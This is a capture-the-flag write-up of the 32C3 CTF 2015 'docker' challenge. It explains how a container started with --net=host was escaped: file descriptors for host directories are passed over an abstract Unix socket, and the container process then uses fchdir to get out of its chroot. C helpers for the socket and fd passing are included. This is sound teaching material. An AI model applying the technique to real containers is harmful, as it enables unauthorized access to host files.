32C3 CTF: Docker writeup
docker was a pwnable worth 250 points during 32C3 CTF 2015. The goal was to escape from a (slightly non-standard) docker container configuration.
Here’s the scenario:
We are given ssh access to a box (ssh://eve@136.243.194.40) as user “eve”. On the box we see the following:
So the goal is pretty clear: read /home/adam/flag, which is only possible as the “adam” user.
The dockerrun binary executes the following command line as root:
This results in a /bin/bash being opened in a docker container, running as the “adam” user (uid 1337). The docker container lives inside its own mount namespace, so we cannot see the “real” /home/adam (/ is a new mountpoint) and thus cannot access the flag.
Ok.
Exploitation
There is one particularly interesting command line argument to docker: --net=host. From the documentation:
--net=host: Tells Docker to skip placing the container inside of a separate network stack. In essence, this choice tells Docker to not containerize the container’s networking! While container processes will still be confined to their own filesystem and process list and resource limits, a quick ip addr command will show you that, network-wise, they live “outside” in the main Docker host and have full access to its network interfaces. Note that this does not let the container reconfigure the host network stack (that would require --privileged=true), but it does let container processes open low-numbered ports like any other root process. It also allows the container to access local network services like D-bus. This can lead to processes in the container being able to do unexpected things like restart your computer. You should use this option with caution.
The key information here is that --net=host allows the container access to networking services on the host!
At this point one needs knowledge of two slightly advanced Linux features:
- Abstract Unix sockets: While “normal” Unix sockets are bound to the filesystem (and thus inaccessible from inside the container), an “abstract” Unix socket is not tied to a path. Its name lives in the network namespace, which the container shares with the host due to --net=host, so the socket is reachable from within the container.
- File descriptors over Unix sockets: It is possible to send open file descriptors over a Unix socket from one process to another (as SCM_RIGHTS ancillary data).
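To make the first point concrete, here is a minimal sketch of how an abstract Unix socket can be bound and connected to on Linux. It is not the code used during the CTF; the helper names `abstract_addr`, `abstract_listen` and `abstract_connect` are made up for illustration. The only difference from a regular Unix socket is that `sun_path` starts with a NUL byte and the address length covers exactly the name.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Fill addr for an abstract socket: sun_path[0] is '\0' and the name
 * follows it. Returns the length to pass to bind()/connect(), or 0 if
 * the name does not fit. (Hypothetical helper, not from the writeup.) */
socklen_t abstract_addr(struct sockaddr_un *addr, const char *name)
{
    size_t len = strlen(name);

    if (len > sizeof(addr->sun_path) - 1)
        return 0;
    memset(addr, 0, sizeof(*addr));
    addr->sun_family = AF_UNIX;
    memcpy(addr->sun_path + 1, name, len);  /* sun_path[0] stays '\0' */
    return (socklen_t)(offsetof(struct sockaddr_un, sun_path) + 1 + len);
}

/* Server side (outside the container): bind and listen on the name. */
int abstract_listen(const char *name)
{
    struct sockaddr_un addr;
    socklen_t alen = abstract_addr(&addr, name);
    int fd;

    if (alen == 0)
        return -1;
    fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (bind(fd, (struct sockaddr *)&addr, alen) < 0 || listen(fd, 1) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Client side (inside the container): connect to the same name. */
int abstract_connect(const char *name)
{
    struct sockaddr_un addr;
    socklen_t alen = abstract_addr(&addr, name);
    int fd;

    if (alen == 0)
        return -1;
    fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&addr, alen) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```

No file is created anywhere, so the container's separate mount namespace does not get in the way. The name disappears once the last descriptor referring to the socket is closed.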
See where this is going?
Here’s the plan:
- Open an abstract Unix socket and bind it to some arbitrary name
- Start the docker container
- Inside the docker container, connect to the previously created Unix socket
- From outside, open /home/adam (since we cannot directly open /home/adam/flag) and send it via the Unix socket to the process inside the container
- Inside the container we can now fchdir(received_fd), then system("cat flag") (or use openat()), and read the flag
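The file descriptor transfer in the last two steps can be sketched as follows. This is a minimal illustration of SCM_RIGHTS passing and not the code from our repository; `send_fd` and `recv_fd` are hypothetical helper names. One byte of ordinary data is sent along with the descriptor, since the ancillary data needs a message to ride on.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>

/* Send the open descriptor fd over the Unix socket sock.
 * Returns 0 on success, -1 on error. (Hypothetical helper.) */
int send_fd(int sock, int fd)
{
    char byte = 'F';                      /* dummy payload */
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union {                               /* correctly aligned control buffer */
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    memset(&msg, 0, sizeof(msg));
    memset(&ctrl, 0, sizeof(ctrl));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;         /* payload is an array of fds */
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor from sock. Returns the new descriptor
 * (valid in the receiving process), or -1 on error. */
int recv_fd(int sock)
{
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int fd;

    memset(&msg, 0, sizeof(msg));
    memset(&ctrl, 0, sizeof(ctrl));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    if (recvmsg(sock, &msg, 0) <= 0)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS ||
        cmsg->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

In the scenario above, the server outside the container would call `send_fd()` on the accepted connection with a descriptor for /home/adam, and the client inside would call `recv_fd()` on its connected socket. The received descriptor refers to the same open directory, regardless of what the receiver's own mount namespace looks like.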
To do that I wrote some C code for the server (running outside the container) and the client (running inside the container). I uploaded the source code for the server to the box and compiled it there (since gcc was available), then uploaded the base64 encoded client binary into the container (since no gcc was available there):
Hm ok, almost. So apparently we also need to break out of a chroot.
Let’s do the following: instead of just reading the flag after doing fchdir() on the received file descriptor, we will spawn a bash process and see what things look like.
We will also send a file descriptor for / instead of /home/adam this time. Doing this results in this slightly amusing bash prompt:
voilà :)
So why did this work? Inside the docker container our root directory is the mount point created by docker (something like /dev/mapper/docker-8:1-930171-95805d296c80d42164fbe2fb43c6af74e3e894825187831c176cf1918ff3512a on /). Once we have done fchdir() to the outside root directory, our working directory is already outside of our own root directory, and we can thus move around freely in the filesystem using relative paths. This is similar to the classic chroot escape, in which a process chroot()s to a subdirectory and then chdir()s to a location outside the new root (but inside the old).
Note, however, that this is not a universal chroot escape: in our case we needed root privileges inside the chroot (the dockerrun binary) to create a new mount namespace. On the other hand, if we try to create a new user namespace and then perform the chroot escape inside of it (where we are root), the kernel will block us (kernel/user_namespace.c):
The code for the server and client can be found in our GitHub repository.